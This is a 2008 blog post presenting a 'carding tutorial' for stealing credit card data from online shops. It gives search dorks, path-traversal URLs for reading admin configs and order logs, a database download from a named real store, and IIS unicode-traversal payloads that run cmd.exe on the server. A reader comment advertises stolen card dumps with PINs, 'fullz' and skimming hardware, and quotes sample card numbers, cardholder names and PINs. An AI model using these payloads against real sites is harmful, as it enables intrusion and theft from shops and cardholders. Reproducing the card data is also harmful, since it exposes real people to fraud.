Security
Software
Necessary

Sunday, October 19, 2008

Hacking Credit Cards - carding tutorial

Hacking credit cards is a very easy job. all you need is a pc and a vulnerable shop site

Warning: This tutorial is only meant for learning process. iplementing the method may land you behind bars. so better stay away from these activities.

E-Commerce

1. Find target Website commerceSQL at google.com, with keyword :

allinurl:/commercesql/

2. For example we get target with url :

http://www.example.com/commercesql/blablabla

3. Replace the URL to be :

-> www.example.com/cgi-bin/commercesql/index.cgi?page=

4. Example to see admin config

-> www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

5. Example to see admin manager

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

6. To see file log/ccnya ->

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. Done


PDShopro

1. Find target Website PDshopro at google.com, with keyword allinurl:/shop/category.asp/
catid=

2. First we have to watch the database configuration by replacing the URL to be: www.example.com/admin/dbsetup.asp

3. Target example : http://www.marktwainbooks.com/admin/dbsetup.asp

4. We will get the name of databese : sdatapdshoppro.mdb

5. Now to download sdatapdshoppro.mdb file, you can replace the URL to be : http:// www.marktwainbooks.com/data/pdshoppro.mdb

6. Open file .mdb- using Microsoft Access

7. Good luck !

Cart32


1. Find target at www.google.com with keyword allinurl:/cart32.exe/

2. For example we have target with url:
http://www.example.com/scripts/cart32.exe/blablabla

3. Replace that url to be -> http://www.example.com/scripts/

4. Modify that url with unicode at the end -> http://www.example.com/scripts/

5. example unicode for path /scripts/ : -->

/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

For path path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

6. for example, at that url using path /scripts/ than relace to be http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\

7. End string unicode with dir+c:\ It means we are on the directory c server target!

8. For enter to the directory replace cc's unicode with -> http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

9. We will get ouput and listing form.32 file'w, for example :WRBURNS-001065.c32

10. For viewing the file with unicode http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32

11. If it doesn't work, you have to try with another unicode.

Stumble Upon Toolbar

2 comments:

the dark said...

I am known on the madspot.org forums and am verified. I usually sell CC, but now I have a new supplier and will no longer some of my groups equipment.

*MSR206 — $200 (5 currently in stock)
*Magstripe plastic cards (500 for $70)
*Fresh Dumps + Pin (US) (1/3 of the account balance inquire for prices)
*Full info with CC.V:

Here are the specs:
MSR206 Reader/Writer USB

Magnetic Swipe Card Reader/Writer MSR206 is designed to offer a card reading/writing solution for ISO 7811/1~6 formats. It reads and writes up to 3 tracks of data, e.g. decoding/encoding and verifying up to 3 tracks of data simultaneously. Also, MSR206 Reader/Writer provides a standard RS-232 interface to communicate with host system or other terminal computers. That will attractively complement an existing system.

Features

* Reading/Writing magnetic stripe card complied with ISO 7811/1~6 formats
* Read/Write High & Low Coercive force of magnetic stripe (300~4000Oe)
* High/Low Coercivity encoding circuitry selectable on screen
* Program software for Windows 98/Me/XP
* Programming software for various read/write performance
* Programmable leading bit, raw data, DMV/AAMVA, and user defined forma
* Manual Swipe to read and/or write card with RS-232 output
* Writing and verifying data on single, dual, or triple track in one swipe
* 5~35ips operational swipe speed of writing data
* 5~55ips operational swipe speed of reading data
* +24VDC+/-10%, 2.0A Max., external power adapter attached
* Good size with dimensions of 210(L) x 60(W) x 65(H) mm
* CE, FCC, UL, cUL certified

$10 Flat rate US Shipping
$30 Flat Rate Shipping anywhere else

DUMP + CC.V Format:
5490991402119784=08041010000047000000 COURTNEY WILLIAMS MBNA
AMERICA BANK, N.A. United States of America Pin 3476
5490997771092064=09051010000091200000 REBEKAH L DUFFALA MBNA
AMERICA BANK, N.A. United States of America Pin 2630

Fullz + CC.V:
Address:
City:
State:
Zip:
Country:
Home Phone:
Date Of Birth:
Social Security Number:
Drivers License Number:
Drivers License State:
Name On Card:
Card Number:
EXP Date:
CC.V:

I deal with Liberty Reserve and Pecunix ONLY
Only serious people inquire!

NO PM’s ONLY email: REWERCCGold @ Gmail.com

–REWER

CHINI said...

Hacking of credit cards isn't a big issue

Plastic CardS

Free Web Hosting

Free Web Hosting with Website Builder

Snap Shots

Get Free Shots from Snap.com